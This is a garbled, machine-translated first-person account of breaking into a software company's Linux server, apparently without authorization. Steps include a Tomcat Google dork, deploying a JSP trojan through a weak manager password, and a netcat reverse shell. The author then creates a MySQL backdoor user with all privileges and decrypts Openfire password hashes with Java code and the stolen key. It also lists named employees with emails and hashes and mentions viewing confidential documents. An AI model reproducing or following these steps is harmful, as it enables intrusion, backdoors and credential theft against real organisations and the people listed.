The starting point is the weak password of the Tomcat/manager/html administrator page.
By the way, you can use google hack to search for tomcat pages.
Enter intitle: Apache. Tomcat "Congratulations in the browser! "
It indicates that the title Keyword is separated by a dot and the page content is matched by a colon.
Of course, if the/manager/html page is deleted, or the Administrator does not configure the account password to be available, the management interface will not be accessible.
Upload Deploy a JSP Trojan:
Essential process for Linux privilege escalation -- rebound with webshell command execution:
Compile the netcat source file:
- Gcc xiaobo. c-o xiaobo
Local listening:
- Nc-vv-lp 12345
Copy codeRebound in JSP Trojan:
- ./Xiaobo xx. xx 12345
Copy codeNote: Sometimes the execution bounce will fail because the file is not set to executable. Set it to full permission directly:
- Chmod 777 xiaobo
Copy code
First, we need to collect the system information:
- Lsb_release-
That is to say, we need to find Ubuntu 12.04 or exploit with the kernel 3.2.0-38.
Usually go to exploit-db.com this website to find.
Unfortunately, you cannot find a few exploit instances.
Of course, we can also seek for a driver or a third-party service to raise the right. I have never succeeded.
Continue to collect server information. Use superscan to scan open ports:
Using metasploit, I tried FTP and SSH exploit and weak passwords. Fruitless
I tried the High-field ports in the browser and found that there was also a tomcat (no weak password) and a sea-file team collaborative management platform.
After google sea-file, it was found that it was an open-source "distributed file synchronization technology" developed by Chinese people.
I carefully studied the installation and configuration of the tool and used sqlite to embed the database. Weibo asked the development team about the location of the file where the tool saves the user account and password: ccnet/peerMgr/usermgr. db. The result is that the folder ccnet has no access permission, but I still find a seahub. db that stores the account name. I opened it and looked at it:
The following account, weak password, and social engineering account are successfully logged on:
We can see that the company is developing, or has completed the contract, project plan, design book, and so on. We can know that this server is from a software company. These things should be confidential --:
First, check whether there are any vulnerabilities to upload or not.
Development language:C/C ++ Python --. The server also comes with something you don't know. So give up. Permission is used to collect information.
You can see the company's member list and administrator:
Continue social engineering:
Find the project under tomcat and find the saved mysql password. You have successfully logged on to mysql using the root password and webshell. (Of course, this is an episode where my webshell cannot connect to mysql, or the show databases, show tables, and other operations are not supported, so I changed the source code again)
| Database Connection Failed |
| Com. mysql. jdbc. exceptions. jdbc4.MySQLNonTransientConnectionException: Cannot load connection class because of underlying exception: 'java. lang. numberFormatException: For input string: "3306; User = root; Password = testxx; DatabaseName = mysql "'. |
To facilitate data viewing, you can directly enable external links. Here, let's take a look:
To protect the server, I will not use the root external link. Avoid being scanned for weak passwords in batches.
Create a user hack and password hack that allow remote connection, and grant all Permissions
- Create user hack identified by 'hink ';
- Grant all privileges on *. * to hack @ "%" identified by "hack ";
-
Copy codeThen, use mysql workbench to connect (dedicated for developers ~ Hey hey)
Episode: It is said that mysql in linux can use the system command to escalate permissions. I remotely connect to mysql on the windows Command Line and try the system user add command. Go to the mysql official website and check the official documentation. The system function. BT5 command line is used to remotely connect to mysql. The system user is added successfully, and the user added to my bt5. Should all of you know what mysql system functions mean?
Back to question: I want to collect all the user accounts and passwords for mysql DATA inventory, and further use the linux root Password for remote ftp or ssh operations.
Some md5 codes are decrypted, basically weak passwords.
Highlights: openfire database.
When I looked at the name, I thought it was a bit too much. Google then got it: Openfire is a real-time WEB-based instant messaging platform, and it was the original Jive Messenger.
| Admin |
De8d41e122591e3ac5dfabf41bb8ee186cb0ec963%ae71 |
Administrator |
Admin@family10.com |
| Caifei |
0db546455b7e6a8bd1905e34028ca31704ae5cf27a65e1c2 |
Cai Fei |
Caifei@qq.com |
| Chensong |
E54b7b46c4862dd1ea159a174eb1e26d6b6c1fac89a5dc73 |
Chen Song |
Chensong@qq.com |
| Liqiang |
4f21a0de9b6a32aadd0a6bd0cf53a82da4244bc85111556e |
Li Qiang |
Liqiang4264@qq.com |
| Liqing |
0d24c065be1fdd4db3dde16d39b8907fda-8a8a4a7f84c75 |
Li Qing |
Liqing@qq.com |
| Liuhuayi |
5809dadd4631e859d995d93ff0587524f75c541ab55f23c6 |
Liu Huayi |
Liuhuayi@qq.com |
| Qiulibo |
8c14fda295def40ba10bcd9b78ee869ce5a9880eaa8c6eb6 |
Qiu Libo |
Qiubibo@qq.com |
| Xuliang |
Ba8dc396077d18e3a5683455a92d808adb06d8ac74f31fa3 |
Xu Liang |
Xuliang@qq.com |
| Zhangxin |
B88349048d4b55b91f9a942652b89cf36d75cc2e8ba2cfd6 |
Zhang Xin |
Zhangxin@qq.com |
The data is decrypted on step 5, and the encryption type cannot be identified. Therefore, the focus of this article is openfire decryption.
Openfire is also an open-source software, and the password uses its own algorithm.
Openfire provides secondary development. Google later found that there were quite a lot of materials. Therefore, we will build a secondary development environment and use the decryption class provided by openfire for decryption ~
- Openfire is implemented through org. jivesoftware. util. Blowfish. java.
- Use the encryptString (String password) and decryptString (String encryptedString) Methods of Blowfish to perform encryption and decryption.
- New Blowfish (String passwordKey) requires passwordKey. Where can I find it?
- Originally, there was a table ofproperty in the openfire database, with the passwordKey value, which was automatically generated when openfire was installed.
- Each time openfire automatically generates a database, this attribute is different. Therefore, if the database changes, it is useless to import the original user information.
- You can use org. jivesoftware. util. Blowfish. java to perform encryption and decryption independently.
-
Copy codeCreate a java project in eclipse, find the org. jivesoftware. util. Blowfish. java class on the official website, and import the project.
Write a new DecryPwd for decryption.
- Public class DecryPwd {
-
- /**
- * @ Param args
- */
- Public static void main (String [] args ){
- // TODO Auto-generated method stub
- String resultPWD = null;
- String passWordKey = "566251afC9Lk39w"; // passwordKey, read from openfire Database
- Blowfish blowFish = new Blowfish (passWordKey); // initialize Based on the encryption key
- ResultPWD = blowFish. decryptString ("de8d41e122591e3ac5dfabf41bb8ee186cb0ec963%ae71 ");
- System. out. println (resultPWD); // return the result
- }
-
- }
Operation successful decryption!
Then I took the account and password to ssh. This is the process.
